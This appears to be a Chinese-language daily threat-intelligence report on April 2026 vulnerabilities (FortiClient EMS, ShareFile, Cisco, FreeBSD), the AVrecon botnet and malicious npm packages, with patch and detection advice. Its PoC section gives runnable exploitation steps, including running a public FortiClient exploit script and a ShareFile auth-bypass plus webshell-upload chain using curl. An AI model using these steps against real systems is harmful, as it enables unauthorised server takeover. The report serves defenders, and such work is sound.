每日安全情报报告 · 2026-04-06
发布时间 :2026-04-06 10:49 CST
风险概览 :🔴 严重 3 项 | 🟠 高危 2 项 | 🟡 中危 1 项
本期重点:Fortinet FortiClient EMS 预认证 RCE 在野利用、Progress ShareFile 未授权 RCE 漏洞链、36 个恶意 npm 包供应链攻击
一、高危漏洞速报
🔴 CVE-2026-35616 --- Fortinet FortiClient EMS 预认证 API 绕过导致 RCE
| 字段 | 详情 |
|---|---|
| 漏洞类型 | 不正确的访问控制(CWE-284)→ 远程代码执行 |
| 受影响组件 | Fortinet FortiClient EMS 7.4.5、7.4.6 |
| CVSS v3.1 评分 | 9.1(严重) |
| 在野利用 | ⚠️ 已确认在野利用,Fortinet 于 2026-04-04 公开披露 |
| PoC 状态 | GitHub 已有公开 PoC 代码 |
| 修复版本 | FortiClient EMS 7.4.7+ 或 7.2.11+ |
漏洞描述:攻击者无需任何身份凭证,即可通过精心构造的 API 请求绕过 FortiClient EMS 的全部认证与授权控制,从而在服务器上实现任意远程代码执行(RCE)。由于 EMS 管理所有注册终端的安全策略,成功利用此漏洞不仅可完全控制 EMS 服务器,还可向其管理的所有 FortiClient 端点下发恶意指令。
CVSS 向量 :CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C
修复建议 :
-
立即安装 Fortinet 紧急补丁,升级至 FortiClient EMS 7.4.7 或 7.2.11+
-
临时缓解:限制 EMS API 仅对白名单 IP 开放,或在 WAF 后方部署
-
审计 EMS 访问日志,查看是否存在未经身份验证的请求
参考链接 :
🔴 CVE-2026-2699 + CVE-2026-2701 --- Progress ShareFile 未授权预认证 RCE 漏洞链
| 字段 | 详情 |
|---|---|
| 漏洞类型 | 认证绕过 + 路径配置不当导致任意代码执行 |
| 受影响组件 | Progress ShareFile Storage Zone Controller ≤ 5.12.3 |
| CVSS 评分 | 严重(未授权完全服务器接管) |
| 在野利用 | 暴露实例约 30,000 个,被勒索软件团伙及 APT 组织积极侦察 |
| PoC 状态 | watchTowr Labs 已公开完整攻击链分析(2026-04-02) |
| 修复版本 | 5.12.4(Progress 于 2026-03-10 静默修复) |
漏洞描述 :
两个漏洞可链式组合实现完全无需认证的 RCE:
-
CVE-2026-2699(认证绕过) :应用程序在返回 HTTP 302 重定向时,由于 C# 代码中
Redirect()布尔参数为false,服务端在发送重定向后并不终止页面执行。攻击者只需拦截响应并移除Location头,即可直接访问/ConfigService/Admin.aspx管理控制台。 -
CVE-2026-2701(路径遍历 → RCE) :获得管理员访问后,攻击者将文件存储路径重新配置为 Web 根目录(如
C:\inetpub\wwwroot\ShareFile\...),随后上传恶意 ASPX WebShell 并直接访问执行,实现 RCE。
修复建议 :
-
立即升级至 5.12.4 版本
-
检查 Web 日志中是否有对
/ConfigService/Admin.aspx的未授权访问 -
审计 Web 根目录,排查意外的 ASPX 文件
参考链接 :
🔴 CVE-2026-20093 --- Cisco IMC 认证绕过(CVSS 9.8,持续在野扫描)
| 字段 | 详情 |
|---|---|
| 漏洞类型 | 认证绕过 → 权限提升 |
| 受影响组件 | Cisco Integrated Management Controller (IMC) |
| CVSS v3.1 评分 | 9.8(严重) |
| 在野利用 | 攻击者持续主动扫描利用,2026-04-01 披露 |
| 披露日期 | 2026-04-01 |
漏洞描述:该漏洞源于密码变更请求处理不当,未经身份验证的远程攻击者可通过向易受攻击的 API 端点发送特制请求,绕过认证机制并以管理员权限完全控制受影响系统。
修复建议:立即安装 Cisco 官方补丁;暂无缓解措施时,限制管理接口的网络访问。
参考链接 :
🟠 CVE-2026-20160 --- Cisco ASA/SSM On-Prem 未授权 RCE(CVSS 9.8,无缓解措施)
| 字段 | 详情 |
|---|---|
| 漏洞类型 | 未授权远程代码执行 |
| 受影响组件 | Cisco Smart Software Manager (SSM) On-Prem |
| CVSS v3.1 评分 | 9.8(严重) |
| 在野利用 | 主动扫描利用,暂无官方缓解措施 |
| 修复状态 | 已发布补丁,无临时缓解方案 |
漏洞描述:未经身份验证的远程攻击者可在受影响的 Cisco SSM On-Prem 部署上执行任意操作系统命令,完全控制目标系统。由于暂无官方缓解措施,强烈建议立即部署补丁。
参考链接 :
🟠 CVE-2026-4747 --- FreeBSD 内核 RCE(AI 独立发现,CVSS 9.2)
| 字段 | 详情 |
|---|---|
| 漏洞类型 | 内核内存管理缺陷 → 远程代码执行 |
| 受影响组件 | FreeBSD 内核(多个版本) |
| CVSS v3.1 评分 | 9.2(严重) |
| 在野利用 | PoC 已公开(由 AI 系统自主发现并生成利用链) |
| 特别说明 | 由 AI 安全研究员(Nicholas Carlini + Claude Code)在 4 小时内独立发现并完成漏洞利用 |
漏洞描述:此漏洞的特殊意义在于,它由 AI 系统(Anthropic Claude Code + 安全研究员 Nicholas Carlini)在不到 4 小时内独立发现并生成完整利用链,标志着 AI 辅助漏洞研究达到全新里程碑。攻击者可利用 FreeBSD 内核的内存管理缺陷,实现本地到远程的代码执行提权。
参考链接 :
🟡 AVrecon 僵尸网络 --- FBI 警告:369,000 台路由器被入侵,遍及 163 国
| 字段 | 详情 |
|---|---|
| 威胁类型 | 路由器 / IoT 设备恶意软件 + 住宅代理僵尸网络 |
| 影响规模 | 感染 369,000 台 路由器/IoT 设备,覆盖 163 个国家 |
| 受影响品牌 | Cisco、D-Link、Hikvision、MikroTik、Netgear、TP-Link、Zyxel 等约 1,200 种设备 |
| 披露机构 | FBI 联合国际执法机构(2026-03-12 公告,2026-04-05 媒体广泛报道) |
| 风险等级 | 🟡 中危(需立即排查) |
威胁描述 :AVrecon 是一种使用 C 语言编写的模块化路由器恶意软件,针对 MIPS/ARM 架构消费级路由器。感染后,设备每 60 秒向 C2 服务器发送心跳包,并在攻击者指令下建立 SOCKS 代理隧道,将家庭/企业 IP 伪装为攻击跳板,用于广告欺诈、密码撞库、银行诈骗等犯罪活动。FBI 已取缔关联的非法代理服务 SocksEscort,但恶意软件仍持续活跃。
防护建议 :
-
立即为路由器/IoT 设备更新固件
-
更换已停产(EoL)设备
-
禁用远程管理或设置强密码
-
监测网络流量中与已知 AVrecon C2 地址的通信
参考链接 :
二、漏洞 PoC 情报
🔴 PoC-01:CVE-2026-35616 --- Fortinet FortiClient EMS 预认证 RCE
来源 :GitHub --- z3r0h3ro/CVE-2026-35616-poc
漏洞概述:FortiClient EMS 7.4.5/7.4.6 中,特制 API 请求可绕过全部认证控制,在服务器上以 SYSTEM 权限执行任意命令。PoC 为 Python 3 脚本,支持对单目标进行认证绕过并执行指定命令。
使用步骤:
bash
# 1. 克隆 PoC 仓库
git clone https://github.com/z3r0h3ro/CVE-2026-35616-poc.git
cd CVE-2026-35616-poc
# 2. 安装依赖
pip3 install requests pyyaml
# 或
pip3 install -r requirements.txt
# 3. 验证目标(仅限授权测试环境)
python3 exploit.py -t https://<目标EMS服务器>:8013 -c "whoami"
# 4. 扩展利用示例:查询 EMS 版本信息
python3 exploit.py -t https://<目标>:8443 -c "powershell -c \"Get-ItemProperty 'HKLM:\\SOFTWARE\\Fortinet\\FortiClientEMS' | Select Version\""影响 :成功利用后可控制 EMS 服务器(SYSTEM 权限),并可向其管理的所有 FortiClient 端点下发恶意策略。
⚠️ 声明:PoC 仅限用于授权的渗透测试和安全研究,未经授权使用属违法行为。
🔴 PoC-02:CVE-2026-2699 + CVE-2026-2701 --- Progress ShareFile 预认证 RCE 链
漏洞概述:通过两步链式攻击,无需任何凭证即可实现对 ShareFile Storage Zone Controller 的完全控制。
使用步骤:
bash
# 步骤一:CVE-2026-2699 --- 认证绕过
# 直接访问管理控制台(服务器会返回 302 重定向到登录页)
curl -i https://<目标ShareFile>/ConfigService/Admin.aspx
# 拦截响应并移除 Location 头(使用 Burp Suite 等代理工具)
# 响应体中包含功能完整的管理控制台页面,可直接操作
# 步骤二:CVE-2026-2701 --- 文件上传路径遍历 → RCE
# 通过管理面板将文件存储路径修改为 Web 根目录
# 配置路径示例(GUI 操作):
# 原路径:C:\StorageZones\Data
# 修改为:C:\inetpub\wwwroot\ShareFile\StorageCenter\documentum
# 上传恶意 ASPX WebShell(伪装为普通文档)
curl -X POST https://<目标>/upload \
-F "file=@webshell.aspx;filename=document.aspx" \
--cookie "admin_session=<从步骤一获取的Cookie>"
# 执行任意命令
curl "https://<目标>/StorageCenter/documentum/document.aspx?cmd=whoami"⚠️ 声明:以上步骤仅用于安全研究和授权渗透测试,请勿对未经授权的系统使用。
🟠 PoC-03:36 个恶意 npm 包 --- Strapi 插件伪装供应链攻击(持久化植入)
来源 :TheHackerNews 报道
漏洞概述 :36 个伪装为 Strapi CMS 插件的恶意 npm 包,通过 postinstall.js 脚本在安装时自动利用 Redis/PostgreSQL 建立持久化后门、部署反向 shell、窃取凭证。
分析与检测步骤:
bash
# 1. 检查是否安装了可疑的 Strapi 相关包(特征:无描述、无仓库地址)
npm list --depth=0 | grep strapi
# 2. 检查 package.json 中的 postinstall 脚本
cat node_modules/<package>/package.json | grep postinstall
# 3. 若发现可疑包,立即卸载
npm uninstall <恶意包名>
# 4. 审计已安装包(使用 npm audit)
npm audit
# 5. 排查系统中是否存在异常的反向 shell 连接
ss -anp | grep ESTABLISHED
netstat -antp | grep ESTABLISHED防护建议 :
-
对所有第三方 npm 包执行
npm audit并审查 postinstall 脚本 -
在 CI/CD 流水线中启用 npm 包签名验证
-
监控 Redis/PostgreSQL 异常连接和未经授权的数据库操作
参考链接 :
三、网络安全最新文章
📰 文章 1 --- Fortinet 修复被积极利用的 CVE-2026-35616 FortiClient EMS 漏洞
- 来源:The Hacker News
- 发布日期:2026-04-05
- 摘要:Fortinet 官方确认 CVE-2026-35616 已在野外被积极利用,并发布紧急修复补丁。该漏洞是 FortiClient EMS 7.4.5/7.4.6 中的预认证 API 访问绕过漏洞,CVSS 评分 9.1,可导致权限提升和完整系统接管。GitHub 上已有公开 PoC,攻击武器化风险极高。
- 风险等级:🔴 严重(已在野利用 + PoC 公开)
- 阅读原文
📰 文章 2 --- Progress ShareFile 新漏洞链允许无需登录即可接管服务器
- 来源:watchTowr Labs / Cyber Press
- 发布日期:2026-04-02 ~ 04-03
- 摘要:watchTowr Labs 的研究人员 Sonny 和 Piotr Bazydlo 披露了 Progress ShareFile Storage Zone Controller 中的漏洞链(CVE-2026-2699 + CVE-2026-2701)。攻击者可通过两步链式利用,在完全未经身份验证的情况下接管服务器。约 30,000 个实例暴露在公网,已成为勒索软件团伙的高价值目标。
- 风险等级:🔴 严重(漏洞链公开 + 大规模暴露)
- 阅读原文
- BleepingComputer 补充报道
📰 文章 3 --- Claude Code 泄露事件被黑客武器化:Vidar 信息窃取器 + GhostSocks 代理木马大规模传播
- 来源:Cyber Press / Trend Micro / Bitdefender
- 发布日期:2026-04-02 ~ 04-04
- 摘要 :2026-03-31,Anthropic 意外将包含 513,000 行 TypeScript 源代码的 59.8MB 文件捆绑进公共 npm 包
@anthropic-ai/claude-code中,导致 Claude Code 内部架构泄露。威胁行为者迅速在 GitHub 上创建虚假仓库,以"泄露源码"为诱饵,诱导开发者下载并运行 Rust 编写的木马(ClaudeCode_x64.exe),实际植入 Vidar v18.7 (账号/信用卡信息窃取)和 GhostSocks(将设备变为攻击者代理节点)。主要目标为搜索泄露代码的开发者群体。 - 风险等级:🟠 高危(开发者社区重点关注)
- 阅读原文(Cyber Press)
- Bitdefender 分析
- The Register 报道
📰 文章 4 --- "BrowserGate":LinkedIn 秘密扫描用户浏览器中 6,000+ 个已安装 Chrome 扩展
- 来源:BleepingComputer / Cybernews / CyberKendra
- 发布日期:2026-04-03 ~ 04-04
- 摘要:独立安全研究人员通过逆向 LinkedIn 生产环境 JavaScript 代码,发现 Microsoft 的 LinkedIn 平台在用户每次打开网页时,会通过隐藏 JavaScript 脚本静默扫描浏览器中安装的 6,000+ 个 Chrome 扩展,并将扫描结果连同设备指纹数据上报,疑似与第三方共享。该事件(被称为"BrowserGate")引发 GDPR 合规担忧,研究人员已公开代码引用证据。
- 风险等级:🟡 中危(用户隐私风险)
- BleepingComputer 报道
- Cybernews 调查报告
📰 文章 5 --- 36 个恶意 npm 包伪装 Strapi 插件,利用 Redis/PostgreSQL 部署持久化植入程序
- 来源:The Hacker News
- 发布日期:2026-04-05
- 摘要 :安全研究人员在 npm 注册表中发现 36 个伪装为 Strapi CMS 插件的恶意包,每个包仅包含三个文件(
package.json、index.js、postinstall.js)且无描述和代码仓库。安装时,postinstall.js自动执行,利用 Redis 和 PostgreSQL 建立持久化后门、部署反向 shell 并窃取凭证,被研究人员认为是针对加密货币平台的定向供应链攻击。 - 风险等级:🟠 高危(供应链威胁)
- 阅读原文(TheHackerNews)
📰 文章 6 --- FBI 警告:AVrecon 路由器恶意软件已入侵 163 国 369,000 台设备
- 来源:FBI IC3 / InfoSecBulletin / The Cyber Express
- 发布日期:2026-03-12(官方公告)/ 2026-04-05(广泛报道)
- 摘要:FBI 联合国际执法机构发布警告,针对路由器和 IoT 设备的 AVrecon 恶意软件已感染全球 163 个国家约 369,000 台设备(涵盖 Cisco、D-Link、Hikvision、MikroTik 等 1,200 种设备型号)。受感染设备被构建为 SOCKS 代理僵尸网络(SocksEscort),被犯罪分子用于广告欺诈、密码撞库和银行诈骗。FBI 已取缔 SocksEscort,但恶意软件持续活跃。
- 风险等级:🟡 中危(需排查家庭/企业网络设备)
- FBI 官方安全公告(IC3 PDF)
- The Cyber Express 报道
四、威胁情报汇总
| 编号 | CVE / 事件 | 类型 | 风险等级 | 在野利用 | 修复状态 |
|---|---|---|---|---|---|
| 1 | CVE-2026-35616 | FortiClient EMS 预认证 RCE | 🔴 严重(9.1) | ✅ 已确认 | 补丁已发布 |
| 2 | CVE-2026-2699/2701 | ShareFile 未授权 RCE 链 | 🔴 严重 | ⚠️ 大规模扫描 | 补丁已发布 |
| 3 | CVE-2026-20093 | Cisco IMC 认证绕过 | 🔴 严重(9.8) | ✅ 主动利用 | 补丁已发布 |
| 4 | CVE-2026-20160 | Cisco SSM 未授权 RCE | 🟠 高危(9.8) | ⚠️ 主动扫描 | 补丁已发布,无缓解措施 |
| 5 | CVE-2026-4747 | FreeBSD 内核 RCE | 🟠 高危(9.2) | PoC 公开 | 补丁开发中 |
| 6 | Claude Code 泄露 | 供应链/社会工程学 | 🟠 高危 | ✅ 积极利用 | 已删除恶意仓库(持续出现) |
| 7 | 36 恶意 npm 包 | npm 供应链攻击 | 🟠 高危 | ✅ 主动传播 | npm 已下架(需清查) |
| 8 | AVrecon 僵尸网络 | 路由器/IoT 恶意软件 | 🟡 中危 | ✅ 持续活跃 | FBI 已取缔 C2,仍需修复设备 |
| 9 | BrowserGate(LinkedIn) | 用户隐私侵犯 | 🟡 中危 | 持续运营中 | 待监管介入 |
五、今日安全建议
- 【立即】 排查 Fortinet FortiClient EMS 版本,7.4.5/7.4.6 受影响,立即升级至 7.4.7+
- 【立即】 排查 Progress ShareFile Storage Zone Controller,≤5.12.3 受影响,立即升级至 5.12.4
- 【立即】 部署 Cisco IMC / SSM 补丁,防止未授权 RCE 攻击
- 【今日】 执行
npm audit,检查项目依赖中是否存在伪装 Strapi 插件的恶意包 - 【今日】 警告开发团队:不要从非官方 GitHub 仓库下载 Claude Code 相关代码
- 【本周】 更新家庭/企业路由器固件,排查 AVrecon 感染迹象(检查
x和dnssmasq进程) - 【持续】 对 LinkedIn 等平台的隐私行为保持关注,在企业浏览器中评估相关扩展暴露风险
本报告内容来源:NVD、The Hacker News、BleepingComputer、watchTowr Labs、Fortinet PSIRT、FBI IC3、Cyber Press、CSA Labs
⚠️ 免责声明:本报告中的 PoC 信息仅用于安全研究和授权渗透测试,请勿用于非法目的。